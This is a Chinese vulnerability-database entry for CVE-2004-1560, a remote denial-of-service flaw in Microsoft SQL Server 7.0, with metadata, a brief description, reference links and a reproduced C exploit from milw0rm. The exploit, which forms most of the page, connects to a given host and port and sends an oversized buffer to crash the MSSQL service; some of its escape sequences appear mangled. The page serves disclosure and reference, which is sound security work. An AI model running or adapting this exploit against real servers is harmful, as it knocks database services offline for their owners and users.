Microsoft SQL Server远程服务拒绝漏洞

Microsoft SQL Server远程服务拒绝漏洞

漏洞ID 1108200 漏洞类型 缓冲区溢出
发布时间 2004-09-29 更新时间 2005-10-20
图片[1]-Microsoft SQL Server远程服务拒绝漏洞-安全小百科CVE编号 CVE-2004-1560
图片[2]-Microsoft SQL Server远程服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200412-305
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/562
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-305
|漏洞详情
MicrosoftSQLServer7.0版本存在漏洞。远程攻击者借助到TCP端口1433的超长请求导致服务拒绝(MSSQLServer服务暂停),还可能触发缓冲区溢出。
|漏洞EXP
/* Microsoft mssql 7.0 server is vulnerable to denial of service attack
* By sending a large buffer with specified data an attacker can stop
the service
* "mssqlserver" the error noticed is different according to services'
pack but the result is always
* the same one.
* Exception Codes = c0000005
* vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3
* This code is for educational purposes, I am not responsible for your acts
* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */

#include <stdio.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")
u_long resolv(char*);


void main(int argc, char **argv) {
WSADATA WinsockData;
SOCKET s;
int i;
struct sockaddr_in vulh;
char buffer[700000];
for(i=0;i<700000;i+=16)memcpy(buffer+i,"x10x00x00x10xccxccxccxccxccxccxccxccxccxccxccxcc",16);


if (argc!=3) {
printf(" MSSQL denial of servicen");
printf(" by securma massinen");
printf("Cet outil a ete cree pour test ,je ne suis en aucun cas
responsable des degats que vous pouvez en fairen");
printf("Syntaxe: MSSQLdos <ip> <port>n");
exit(1);
}

WSAStartup(0x101,&WinsockData);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));
vulh.sin_family=AF_INET;
vulh.sin_addr.s_addr=resolv(argv[1]);
vulh.sin_port=htons(atoi(argv[2]));
if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("Impossible de se connecter...le port est en generale 1433...n");
exit(1);
}

{
send(s,buffer,sizeof(buffer),0);

printf("Data envoyes...n");
}
printf("nattendez quelques secondes et verifiez que le serveur ne
repond plus.n");
closesocket(s);
WSACleanup();
}


u_long resolv(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1) {
if (!(host_ent = gethostbyname(host_name))) {
printf ("Erreur DNS : Impossible de résoudre l'adresse %s
!!!n",host_name);
exit(1);
}
CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);
}
return addr.s_addr;
}

// milw0rm.com [2004-09-29]
|参考资料

来源:XF
名称:mssql-data-buffer-dos(17542)
链接:http://xforce.iss.net/xforce/xfdb/17542
来源:BID
名称:11265
链接:http://www.securityfocus.com/bid/11265
来源:SECTRACK
名称:1011434
链接:http://securitytracker.com/id?1011434
来源:SECUNIA
名称:12680
链接:http://secunia.com/advisories/12680
来源:packetstormsecurity.nl
链接:http://packetstormsecurity.nl/0410-exploits/mssql.7.0.dos.c
来源:BUGTRAQ
名称:20040928MSSQL7.0DoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109650760210411&w;=2

相关推荐: NatterChat Unspecified SQL Injection Vulnerability

NatterChat Unspecified SQL Injection Vulnerability 漏洞ID 1097909 漏洞类型 Input Validation Error 发布时间 2004-10-14 更新时间 2004-10-14 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享